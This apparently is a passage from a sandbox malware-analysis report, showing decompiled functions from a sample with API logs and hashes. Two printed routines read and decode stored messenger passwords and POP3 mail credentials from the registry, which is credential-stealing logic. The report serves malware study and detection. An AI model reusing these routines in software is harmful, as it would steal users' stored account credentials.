                                                                                                                                                    0x00401b4f
                                                                                                                                                    0x00401b82
                                                                                                                                                    0x00401b93
                                                                                                                                                    0x00401b9b
                                                                                                                                                    0x00401b9c
                                                                                                                                                    0x00401ba4
                                                                                                                                                    0x00401ba4
                                                                                                                                                    0x00401baa
                                                                                                                                                    0x00401bbb
                                                                                                                                                    0x00401bd1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401bbd
                                                                                                                                                    0x00401bc0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401bc2
                                                                                                                                                    0x00401bc6
                                                                                                                                                    0x00401bc6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401bc0
                                                                                                                                                    0x00401bac
                                                                                                                                                    0x00401bb0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401bb0
                                                                                                                                                    0x00401b9e
                                                                                                                                                    0x00401b9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401b9e
                                                                                                                                                    0x00401b51
                                                                                                                                                    0x00401b5c
                                                                                                                                                    0x00401b63
                                                                                                                                                    0x00401b67
                                                                                                                                                    0x00401b68
                                                                                                                                                    0x00401b72
                                                                                                                                                    0x00401b6a
                                                                                                                                                    0x00401b6a
                                                                                                                                                    0x00401b6a
                                                                                                                                                    0x00401b6a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401b68
                                                                                                                                                    0x00401b0e
                                                                                                                                                    0x00401b16
                                                                                                                                                    0x00401bd3
                                                                                                                                                    0x00401bd7
                                                                                                                                                    0x00401bdd
                                                                                                                                                    0x00401bdd
                                                                                                                                                    0x00401bdd
                                                                                                                                                    0x00401be1
                                                                                                                                                    0x00401be2
                                                                                                                                                    0x00401aa4
                                                                                                                                                    0x00401bf2
                                                                                                                                                    0x00401bf6
                                                                                                                                                    0x00401bf7
                                                                                                                                                    0x00401bf9
                                                                                                                                                    0x00401bf9
                                                                                                                                                    0x00401c01
                                                                                                                                                    0x00401c03
                                                                                                                                                    0x00401c03
                                                                                                                                                    0x00401c0b
                                                                                                                                                    0x00401c0d
                                                                                                                                                    0x00401c0d
                                                                                                                                                    0x00401c16
                                                                                                                                                    0x00401c18
                                                                                                                                                    0x00401c18
                                                                                                                                                    0x00401c21
                                                                                                                                                    0x00401c23
                                                                                                                                                    0x00401c23
                                                                                                                                                    0x00401c2c
                                                                                                                                                    0x00401c2e
                                                                                                                                                    0x00401c2e
                                                                                                                                                    0x00401c37
                                                                                                                                                    0x00401c83
                                                                                                                                                    0x00401c89
                                                                                                                                                    0x00401c8e
                                                                                                                                                    0x00401c8f
                                                                                                                                                    0x00401c39
                                                                                                                                                    0x00401c39
                                                                                                                                                    0x00401c3d
                                                                                                                                                    0x00401c3e
                                                                                                                                                    0x00401c3f
                                                                                                                                                    0x00401c42
                                                                                                                                                    0x00401c47
                                                                                                                                                    0x00401c51
                                                                                                                                                    0x00401c54
                                                                                                                                                    0x00401c5d
                                                                                                                                                    0x00401c67
                                                                                                                                                    0x00401c6b
                                                                                                                                                    0x00401c6f
                                                                                                                                                    0x00401c75
                                                                                                                                                    0x00401c7a
                                                                                                                                                    0x00401c7b
                                                                                                                                                    0x00401c7b
                                                                                                                                                    0x00401c96

Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Similarity
• API ID: free$strlen
• String ID:
• API String ID: 667451143-3916222277
• Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
• Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
• Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
• Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040D4A6(char* __ebx, void** _a4) {
	int _v8;
	int _v12;
	int _v16;
	void* _v20;
	int _v24;
	char* _v28;
	char _v32;
	char _v556;
	char _v557;
	char _v1578;
	void _v1580;
	void* __edi;
	void* __esi;
	long _t39;
	int _t43;
	char _t48;
	char* _t63;
	int* _t67;
	char* _t69;   /* temporary the decompiler used without declaring: pointer to the _v556 decode context */
	int _t74;     /* temporary the decompiler used without declaring: first byte of _v1580 minus 0x20 */

	_t63 = __ebx;
	_t67 = 0;
	_v16 = 0;
	_v12 = 0x400;
	/* Read the stored "Password.NET Messenger Service" value (up to 0x400 bytes) from the registry key the caller opened */
	_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
	if(_t39 != 0) {
		L13:
		RegCloseKey( *_a4);
		return _v16;
	}
	_t43 = _t39 + 1;
	if(_v12 <= _t43) {
		goto L13;
	}
	_t74 = _v1580 - 0x20;
	_v8 = 0;
	/* First byte >= 0x20: the value is used as-is; otherwise it is handed to the E004046D7/E004047A0/E00404811 helpers to be decoded into _v20 */
	if(_v1580 >= 0x20) {
		_v8 = _t43;
		L10:
		if(_v8 != _t67) {
			/* Copy the password into the caller's buffer at offset 0x100, then read the matching user name into the first 0xff bytes */
			_v557 = 0;
			E00401380( &_v1580,  &(_t63[0x100]), 0xff);
			_v8 = 0xff;
			_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
			if(_t48 == 0) {
				_t63[0xfe] = _t48;
				_t63[0x1fe] = _t48;
				_v16 = 1;   /* success: both user name and password were recovered */
			}
		}
		goto L13;
	}
	_t69 =  &_v556;
	E004046D7( &_v556);
	if(E004047A0(_t69, _t74) == 0) {
		L8:
		E004047F1( &_v556);
		_t67 = 0;
		goto L10;
	}
	_v32 = _v12 + 0xfffffffe;
	_v28 =  &_v1578;
	if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
		goto L8;
	}
	if(_v24 < 0x400) {
		memcpy( &_v1580, _v20, _v24);
		_v8 = 1;
	}
	LocalFree(_v20);
	goto L8;
}

                                                                                                                                                    0x0040d4a6
                                                                                                                                                    0x0040d4bf
                                                                                                                                                    0x0040d4cf
                                                                                                                                                    0x0040d4d2
                                                                                                                                                    0x0040d4d5
                                                                                                                                                    0x0040d4dd
                                                                                                                                                    0x0040d5c7
                                                                                                                                                    0x0040d5cc
                                                                                                                                                    0x0040d5d8
                                                                                                                                                    0x0040d5d8
                                                                                                                                                    0x0040d4e3
                                                                                                                                                    0x0040d4e7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d4ed
                                                                                                                                                    0x0040d4f4
                                                                                                                                                    0x0040d4f7
                                                                                                                                                    0x0040d56d
                                                                                                                                                    0x0040d570
                                                                                                                                                    0x0040d573
                                                                                                                                                    0x0040d587
                                                                                                                                                    0x0040d58e
                                                                                                                                                    0x0040d5a7
                                                                                                                                                    0x0040d5aa
                                                                                                                                                    0x0040d5b2
                                                                                                                                                    0x0040d5b4
                                                                                                                                                    0x0040d5ba
                                                                                                                                                    0x0040d5c0
                                                                                                                                                    0x0040d5c0
                                                                                                                                                    0x0040d5b2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d573
                                                                                                                                                    0x0040d4f9
                                                                                                                                                    0x0040d4ff
                                                                                                                                                    0x0040d50b
                                                                                                                                                    0x0040d55e
                                                                                                                                                    0x0040d564
                                                                                                                                                    0x0040d569
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d569
                                                                                                                                                    0x0040d513
                                                                                                                                                    0x0040d51c
                                                                                                                                                    0x0040d532
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d537
                                                                                                                                                    0x0040d546
                                                                                                                                                    0x0040d54e
                                                                                                                                                    0x0040d54e
                                                                                                                                                    0x0040d558
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,7554F420), ref: 0040D4D5
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    • memcpy.MSVCRT ref: 0040D546
                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                                                                                    • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                                                                                    • API String ID: 3289975857-105384665
                                                                                                                                                    • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                                                                                    • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                                                                                                                    • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                                                                                    • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                    				char _v12;
                                                                                                                                                    				short* _v16;
                                                                                                                                                    				char _v20;
                                                                                                                                                    				char* _v24;
                                                                                                                                                    				char _v28;
                                                                                                                                                    				char _v288;
                                                                                                                                                    				char _v544;
                                                                                                                                                    				char _v800;
                                                                                                                                                    				char _v1056;
                                                                                                                                                    				char _v1584;
                                                                                                                                                    				void _v2607;
                                                                                                                                                    				char _v2608;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t36;
                                                                                                                                                    				void* _t63;
                                                                                                                                                    				char* _t66;
                                                                                                                                                    				void* _t68;
                                                                                                                                                    
                                                                                                                                                    				_t63 = __ecx;
                                                                                                                                                    				_v2608 = 0;
                                                                                                                                                    				memset( &_v2607, 0, 0x3ff);
                                                                                                                                                    				_v12 = 0x400;
                                                                                                                                                    				_v1056 = 0;
                                                                                                                                                    				_v800 = 0;
                                                                                                                                                    				_v544 = 0;
                                                                                                                                                    				_v288 = 0;
                                                                                                                                                    				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
                                                                                                                                                    				_t72 = _t36;
                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                    					return _t36;
                                                                                                                                                    				}
                                                                                                                                                    				_t67 =  &_v1584;
                                                                                                                                                    				E004046D7( &_v1584);
                                                                                                                                                    				if(E004047A0( &_v1584, _t72) != 0) {
                                                                                                                                                    					_v24 =  &_v2608;
                                                                                                                                                    					_v28 = _v12;
                                                                                                                                                    					_t16 =  &_v20; // 0x407221
                                                                                                                                                    					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
                                                                                                                                                    						_t19 =  &_v20; // 0x407221
                                                                                                                                                    						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
                                                                                                                                                    						LocalFree(_v16);
                                                                                                                                                    						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
                                                                                                                                                    						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
                                                                                                                                                    						_t28 =  &_a12; // 0x407221
                                                                                                                                                    						_t66 =  &_v1056;
                                                                                                                                                    						E004060D0(0xff, _t66,  *_t28);
                                                                                                                                                    						 *((intOrPtr*)( *_a4))(_t66);
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return E004047F1( &_v1584);
                                                                                                                                                    			}

                                                                                                                                                    0x0040706c
                                                                                                                                                    0x00407087
                                                                                                                                                    0x0040708d
                                                                                                                                                    0x004070a5
                                                                                                                                                    0x004070ac
                                                                                                                                                    0x004070b2
                                                                                                                                                    0x004070b8
                                                                                                                                                    0x004070be
                                                                                                                                                    0x004070c4
                                                                                                                                                    0x004070cc
                                                                                                                                                    0x004070ce
                                                                                                                                                    0x00407199
                                                                                                                                                    0x00407199
                                                                                                                                                    0x004070d4
                                                                                                                                                    0x004070da
                                                                                                                                                    0x004070e6
                                                                                                                                                    0x004070f2
                                                                                                                                                    0x004070f8
                                                                                                                                                    0x004070fb
                                                                                                                                                    0x0040710d
                                                                                                                                                    0x0040711d
                                                                                                                                                    0x00407131
                                                                                                                                                    0x00407138
                                                                                                                                                    0x00407154
                                                                                                                                                    0x0040716a
                                                                                                                                                    0x0040716f
                                                                                                                                                    0x00407172
                                                                                                                                                    0x00407178
                                                                                                                                                    0x00407188
                                                                                                                                                    0x00407188
                                                                                                                                                    0x0040710d
                                                                                                                                                    0x00000000

APIs
• memset.MSVCRT ref: 0040708D
  • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
  • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
  • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
• LocalFree.KERNEL32(?,?,?,?,?,00000000,7554ED80,?), ref: 00407138
  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
• String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
• API String ID: 604216836-250559020
• Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
• Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
• Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
• Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
			// Decompiled error-to-text helper: renders the Win32/NetAPI error code passed in edi
			// into the caller's buffer _a4. This is the pattern Microsoft documents for NetAPI
			// (NERR_*) errors, whose message texts live in netmsg.dll rather than in the system
			// message table. Comments were added to the decompiler output; the constants are
			// decoded in place.
			E00405E46(long __edi, char* _a4) {
				char _v8;     // receives the buffer FormatMessageA allocates
				void* _t8;    // netmsg.dll module handle, or NULL
				void* _t10;
				long _t14;    // FormatMessageA flag word
				long _t24;    // error code
				
				_t24 = __edi;
				// Subtract-and-compare range check: 0x834 <= err <= 0x834 + 0x383,
				// i.e. 2100..2999 = NERR_BASE..MAX_NERR.
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100; // FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2); // 2 = LOAD_LIBRARY_AS_DATAFILE; the handle is never freed
					if(_t8 != 0) { // the decompiler printed "0 != 0" here; the test is on the returned module handle
						_t14 = 0x1900; // adds FORMAT_MESSAGE_FROM_HMODULE (0x800)
					}
				}
				// Language 0x400 = MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT); nSize 0 is fine with
				// ALLOCATE_BUFFER. Arguments is NULL and FORMAT_MESSAGE_IGNORE_INSERTS is not set, so a
				// message containing %1-style inserts would make FormatMessageA read a NULL argument list.
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					// The caller's buffer is assumed to hold 0x400 bytes; a longer message is silently dropped
					// and _a4 is left untouched.
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8); // release the buffer FormatMessageA allocated
				}
				return _t10;
			}

Address map for E00405E46: one instruction address per C statement above, 0x00405e46 through 0x00405eca (the side column was flattened by extraction).
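The constants in E00405E46 decode to the standard Win32 sequence for rendering NetAPI errors. The Python below is an added illustration and is not part of the Joe Sandbox report or of the sample: it reproduces only the routine's control decisions (the flag word, whether netmsg.dll is loaded, and the range check) so they can be checked against the decompilation without running the binary. The constant names are the documented Win32 ones; the helper names are mine; the subtract-and-compare is modelled as an unsigned 32-bit compare, which is an assumption about the original instruction sequence (the usual compiler idiom for a range check). It calls no Win32 API, so it runs on any platform.

```python
"""Model the FormatMessageA / netmsg.dll decisions seen in E00405E46 (added example, not sample code)."""
from typing import Dict, List, Tuple

# Documented Win32 constants (winbase.h / lmerr.h)
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x0100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x0200
FORMAT_MESSAGE_FROM_HMODULE = 0x0800
FORMAT_MESSAGE_FROM_SYSTEM = 0x1000
LOAD_LIBRARY_AS_DATAFILE = 0x0002
NERR_BASE = 2100  # 0x834, the immediate subtracted in the listing
MAX_NERR = 2999   # NERR_BASE + 0x383, the bound the listing compares against
LANG_NEUTRAL_SUBLANG_DEFAULT = 0x400  # MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT)

FLAG_NAMES: Dict[int, str] = {
    FORMAT_MESSAGE_ALLOCATE_BUFFER: "FORMAT_MESSAGE_ALLOCATE_BUFFER",
    FORMAT_MESSAGE_IGNORE_INSERTS: "FORMAT_MESSAGE_IGNORE_INSERTS",
    FORMAT_MESSAGE_FROM_HMODULE: "FORMAT_MESSAGE_FROM_HMODULE",
    FORMAT_MESSAGE_FROM_SYSTEM: "FORMAT_MESSAGE_FROM_SYSTEM",
}


def decode_flags(flags: int) -> List[str]:
    """Name the FormatMessage flag bits set in a flag word such as 0x1100 or 0x1900."""
    names = [name for bit, name in sorted(FLAG_NAMES.items()) if flags & bit]
    unknown = flags & ~sum(FLAG_NAMES)
    if unknown:
        names.append(f"UNKNOWN(0x{unknown:x})")
    return names


def is_netapi_error(code: int) -> bool:
    """The listing's (code - 0x834) <= 0x383, taken as an unsigned 32-bit compare (assumption).
    The wrap-around rejects codes below NERR_BASE just as the bound rejects codes above MAX_NERR."""
    return ((code - NERR_BASE) & 0xFFFFFFFF) <= (MAX_NERR - NERR_BASE)


def plan_format_message(code: int, netmsg_loads: bool = True) -> Tuple[int, bool]:
    """Return (flags, tries_netmsg) exactly as E00405E46 chooses them for an error code.
    netmsg_loads models whether LoadLibraryExA("netmsg.dll", 0, LOAD_LIBRARY_AS_DATAFILE) succeeded."""
    flags = FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM  # 0x1100 in the listing
    tries_netmsg = False
    if is_netapi_error(code):
        tries_netmsg = True
        if netmsg_loads:
            flags |= FORMAT_MESSAGE_FROM_HMODULE  # 0x1900 in the listing
    return flags, tries_netmsg


def missing_ignore_inserts(flags: int) -> bool:
    """True when system messages are formatted without FORMAT_MESSAGE_IGNORE_INSERTS: with a NULL
    Arguments pointer, as in the listing, a message containing %1-style inserts is then unsafe."""
    return bool(flags & FORMAT_MESSAGE_FROM_SYSTEM) and not flags & FORMAT_MESSAGE_IGNORE_INSERTS


if __name__ == "__main__":
    for err in (5, 2100, 2250, 2999, 3000):
        flags, tries = plan_format_message(err)
        print(f"error {err:5d}: flags=0x{flags:04x} {decode_flags(flags)} "
              f"netmsg.dll={'loaded' if tries else 'not loaded'}")
```

Running it shows the two flag words the API log records for this routine, 0x1100 for ordinary Win32 codes and 0x1900 only for 2100..2999, and confirms that the 0x834/0x383 pair is a NERR range check rather than two unrelated magic numbers.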

APIs
• LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
• FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
• strlen.MSVCRT ref: 00405E96
• strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
• LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
• strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
• String ID: Unknown Error$netmsg.dll
• API String ID: 3198317522-572158859
• Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
• Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
• Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
• Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			// Decompiled initialiser: fills the object passed in eax from a static table of
			// 13 records of 0x24 bytes each at 0x4168e0..0x416ab4 (0x1d4 bytes). Comments were
			// added to the decompiler output; the listing on this page ends before the function does.
			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
				char _v8;          // cursor into the static table
				signed int _v12;   // record index, scaled for array A (x 0x14) and then array B (x 0x10)
				signed int _v16;   // dword read from the record at offset 0x10
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;
				
				_t174 = __eflags;
				_t172 = __eax; // the object being initialised
				E00408572(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 0xd; // 13 table records
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156; // 13 x 0x14 bytes
				 *(_t172 + 0x1b0) = _t122;
				// "~(0 | eflags > 0) | size" is how the decompiler renders the multiply-overflow guard
				// (seto/neg/or) that forces an overflowed size to 0xFFFFFFFF before the call;
				// L004115D0 is therefore taken to be the allocator (operator new or malloc).
				_push( ~(0 | _t174 > 0x00000000) | _t96);
				L004115D0();
				 *(_t172 + 0x1b4) = _t96; // array A: 13 records of 0x14 bytes
				_t158 = 0x10;
				_t98 = _t122 * _t158; // 13 x 0x10 bytes
				_push( ~(0 | _t174 > 0x00000000) | _t98);
				L004115D0();
				 *(_t172 + 0x34) = _t98; // array B: 13 records of 0x10 bytes
				_v8 = 0x4168e0; // first static record; each record is 0x24 bytes
				do {
					_t21 =  &_v8; // 0x4168e0
					_t99 =  *_t21;
					_t168 =  *_t99; // first dword of the record selects the slot in A and B
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14); // record bytes 0x00..0x13 -> A[slot]
					_t24 =  &_v8; // 0x4168e0
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10); // record bytes 0x14..0x23 -> B[slot]
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10); // dword at offset 0x10 of A[slot]
					_t173 = _t173 + 0x18; // stack clean-up for the two memcpy calls
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107; // mirrored into B[slot] + 0xc
					// A zero high word marks the field as a 16-bit ID rather than a pointer (the same
					// test IS_INTRESOURCE makes). E004078FF resolves the ID, and the ID | 0x10000
					// variant, into the pointers that replace it in A and B respectively.
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
						_t121 = E004078FF(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 0xd;
					}
					_v8 = _v8 + 0x24; // next record
					_t178 = _v8 - 0x416ab4;
				} while (_t178 < 0); // until the end of the table at 0x416ab4
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161; // 13 x 4-byte slots
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				_push( ~(0 | _t178 > 0x00000000) | _t110); // same overflow-guarded size as above
				L004115D0();
				_push(0xc);
				 *(_t172 + 0x24) = _t110;
				L004115D0(); // 12-byte object; its address ends up in _t170
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64; // default of 100 when the field at +0x48 is unset
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
                                                                                                                                                    					_push( ~(0 | _t180 > 0x00000000) | _t117);
                                                                                                                                                    					L004115D0();
                                                                                                                                                    					_a4 = _a4 & 0x00000000;
                                                                                                                                                    					 *_t170 = _t117;
                                                                                                                                                    					do {
                                                                                                                                                    						_t152 = _a4;
                                                                                                                                                    						_t119 = _t152 << 2;
                                                                                                                                                    						_a4 = _a4 + 1;
                                                                                                                                                    						 *( *_t170 + _t119 + 2) = _t152;
                                                                                                                                                    						 *((short*)(_t119 +  *_t170)) = _a8;
                                                                                                                                                    					} while (_a4 < _t122);
                                                                                                                                                    				}
                                                                                                                                                    				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
                                                                                                                                                    				 *(_t172 + 0x1a0) = _t170;
                                                                                                                                                    				 *((intOrPtr*)(_t172 + 0x40)) = 1;
                                                                                                                                                    				 *((intOrPtr*)(_t172 + 0x198)) = 1;
                                                                                                                                                    				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
                                                                                                                                                    				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
                                                                                                                                                    				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
                                                                                                                                                    				return E004086DC(_t172);
                                                                                                                                                    			}


                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                                                                                                                    • memcpy.MSVCRT ref: 004087D7
                                                                                                                                                    • memcpy.MSVCRT ref: 004087F4
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00408887
